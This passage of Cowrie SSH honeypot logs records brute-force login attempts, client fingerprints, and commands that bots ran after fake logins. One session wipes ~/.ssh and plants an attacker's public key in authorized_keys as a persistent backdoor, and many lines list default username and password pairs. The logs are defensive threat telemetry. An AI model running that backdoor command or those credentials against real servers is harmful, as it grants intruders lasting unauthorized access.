bc","arcfour128","arcfour","cast128-cbc","3des-cbc","none"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com","none"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2311efe7204dfc3007bb4ce758ac6a98","sensor":"my-vps","timestamp":"2025-08-31T01:27:55.038635Z","src_ip":"194.0.234.18","session":"ddb31b794520"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"FTP","message":"login attempt [ftp/FTP] failed","sensor":"my-vps","timestamp":"2025-08-31T01:27:55.180285Z","src_ip":"194.0.234.18","session":"ddb31b794520"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:27:56.197592Z","src_ip":"194.0.234.18","session":"ddb31b794520"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55594,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ccedeeef452","protocol":"ssh","message":"New connection: 217.72.205.35:55594 (1.2.3.4:22) [session: 0ccedeeef452]","sensor":"my-vps","timestamp":"2025-08-31T01:28:13.438132Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:28:13.439270Z","src_ip":"217.72.205.35","session":"0ccedeeef452"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35212,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b172dc5999d","protocol":"ssh","message":"New connection: 212.227.235.229:35212 (1.2.3.4:22) [session: 0b172dc5999d]","sensor":"my-vps","timestamp":"2025-08-31T01:28:19.487308Z"}
{"eventid":"cowrie.session.connect","src_ip":"102.88.137.80","src_port":49644,"dst_ip":"1.2.3.4","dst_port":22,"session":"7359f6cbfe41","protocol":"ssh","message":"New connection: 102.88.137.80:49644 (1.2.3.4:22) [session: 7359f6cbfe41]","sensor":"my-vps","timestamp":"2025-08-31T01:28:19.726564Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:28:19.727593Z","src_ip":"102.88.137.80","session":"7359f6cbfe41"}
{"eventid":"cowrie.client.kex","hassh":"713bd9cc935561939c02dad25af2d3de","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes256-ctr","aes256-cbc","aes128-gcm@openssh.com","aes128-ctr","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 713bd9cc935561939c02dad25af2d3de","sensor":"my-vps","timestamp":"2025-08-31T01:28:19.850140Z","src_ip":"102.88.137.80","session":"7359f6cbfe41"}
{"eventid":"cowrie.login.failed","username":"seedbox","password":"seedbox","message":"login attempt [seedbox/seedbox] failed","sensor":"my-vps","timestamp":"2025-08-31T01:28:20.381502Z","src_ip":"102.88.137.80","session":"7359f6cbfe41"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:28:20.473939Z","src_ip":"212.227.235.229","session":"0b172dc5999d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:28:20.474626Z","src_ip":"212.227.235.229","session":"0b172dc5999d"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:28:21.509713Z","src_ip":"102.88.137.80","session":"7359f6cbfe41"}
{"eventid":"cowrie.login.failed","username":"developer","password":"password","message":"login attempt [developer/password] failed","sensor":"my-vps","timestamp":"2025-08-31T01:28:26.399967Z","src_ip":"212.227.235.229","session":"0b172dc5999d"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:28:28.271333Z","src_ip":"212.227.235.229","session":"0b172dc5999d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58516,"dst_ip":"1.2.3.4","dst_port":22,"session":"515d7fbfe129","protocol":"ssh","message":"New connection: 212.227.125.160:58516 (1.2.3.4:22) [session: 515d7fbfe129]","sensor":"my-vps","timestamp":"2025-08-31T01:28:31.540642Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:28:32.541878Z","src_ip":"212.227.125.160","session":"515d7fbfe129"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:28:32.542577Z","src_ip":"212.227.125.160","session":"515d7fbfe129"}
{"eventid":"cowrie.login.success","username":"root","password":"r7w957957","message":"login attempt [root/r7w957957] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:28:37.820574Z","src_ip":"212.227.125.160","session":"515d7fbfe129"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54120,"dst_ip":"1.2.3.4","dst_port":22,"session":"7db87ee9effe","protocol":"ssh","message":"New connection: 212.227.125.160:54120 (1.2.3.4:22) [session: 7db87ee9effe]","sensor":"my-vps","timestamp":"2025-08-31T01:28:41.518436Z"}
{"eventid":"cowrie.login.success","username":"root","password":"Kawaii","message":"login attempt [root/Kawaii] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:28:42.346687Z","src_ip":"212.227.235.229","session":"b44184811555"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:28:43.445192Z","src_ip":"212.227.125.160","session":"515d7fbfe129"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-31T01:28:43.446173Z","src_ip":"212.227.125.160","session":"515d7fbfe129"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:28:43.639241Z","src_ip":"212.227.125.160","session":"7db87ee9effe"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:28:43.640156Z","src_ip":"212.227.125.160","session":"7db87ee9effe"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"1.6","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:28:45.030458Z","src_ip":"212.227.125.160","session":"515d7fbfe129"}
{"eventid":"cowrie.session.closed","duration":"13.5","message":"Connection lost after 13.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:28:45.031994Z","src_ip":"212.227.125.160","session":"515d7fbfe129"}
{"eventid":"cowrie.login.failed","username":"developer","password":"password","message":"login attempt [developer/password] failed","sensor":"my-vps","timestamp":"2025-08-31T01:28:45.838019Z","src_ip":"212.227.125.160","session":"7db87ee9effe"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:28:47.319618Z","src_ip":"212.227.125.160","session":"7db87ee9effe"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":46398,"dst_ip":"1.2.3.4","dst_port":22,"session":"acd84365e8db","protocol":"ssh","message":"New connection: 201.148.180.50:46398 (1.2.3.4:22) [session: acd84365e8db]","sensor":"my-vps","timestamp":"2025-08-31T01:28:51.108393Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:28:52.242597Z","src_ip":"201.148.180.50","session":"acd84365e8db"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:28:52.243364Z","src_ip":"201.148.180.50","session":"acd84365e8db"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54958,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3be94268ca9","protocol":"ssh","message":"New connection: 212.227.235.229:54958 (1.2.3.4:22) [session: a3be94268ca9]","sensor":"my-vps","timestamp":"2025-08-31T01:28:52.462445Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:28:52.463773Z","src_ip":"212.227.235.229","session":"a3be94268ca9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:28:52.672300Z","src_ip":"212.227.235.229","session":"a3be94268ca9"}
{"eventid":"cowrie.login.success","username":"root","password":"123QWEasdQWE","message":"login attempt [root/123QWEasdQWE] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:28:53.548325Z","src_ip":"212.227.235.229","session":"a3be94268ca9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:28:53.981832Z","src_ip":"212.227.235.229","session":"a3be94268ca9"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:28:53.982522Z","src_ip":"212.227.235.229","session":"a3be94268ca9"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:28:53.983367Z","src_ip":"212.227.235.229","session":"a3be94268ca9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:28:54.192938Z","src_ip":"212.227.235.229","session":"a3be94268ca9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:28:55.123898Z","src_ip":"212.227.235.229","session":"a3be94268ca9"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T01:28:55.124650Z","src_ip":"212.227.235.229","session":"a3be94268ca9"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T01:28:55.335260Z","src_ip":"212.227.235.229","session":"a3be94268ca9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:28:55.336224Z","src_ip":"212.227.235.229","session":"a3be94268ca9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54962,"dst_ip":"1.2.3.4","dst_port":22,"session":"f2fb2b395dc8","protocol":"ssh","message":"New connection: 212.227.235.229:54962 (1.2.3.4:22) [session: f2fb2b395dc8]","sensor":"my-vps","timestamp":"2025-08-31T01:28:55.540007Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:28:55.540904Z","src_ip":"212.227.235.229","session":"f2fb2b395dc8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:28:55.747064Z","src_ip":"212.227.235.229","session":"f2fb2b395dc8"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T01:28:56.616057Z","src_ip":"212.227.235.229","session":"f2fb2b395dc8"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:28:57.824860Z","src_ip":"212.227.235.229","session":"f2fb2b395dc8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:28:57.992904Z","src_ip":"212.227.235.229","session":"b44184811555"}
{"eventid":"cowrie.command.input","input":"uptime","message":"CMD: uptime","sensor":"my-vps","timestamp":"2025-08-31T01:28:57.993634Z","src_ip":"212.227.235.229","session":"b44184811555"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45144,"dst_ip":"1.2.3.4","dst_port":22,"session":"c27697ac13b0","protocol":"ssh","message":"New connection: 212.227.235.229:45144 (1.2.3.4:22) [session: c27697ac13b0]","sensor":"my-vps","timestamp":"2025-08-31T01:28:58.033128Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:28:58.034253Z","src_ip":"212.227.235.229","session":"c27697ac13b0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@op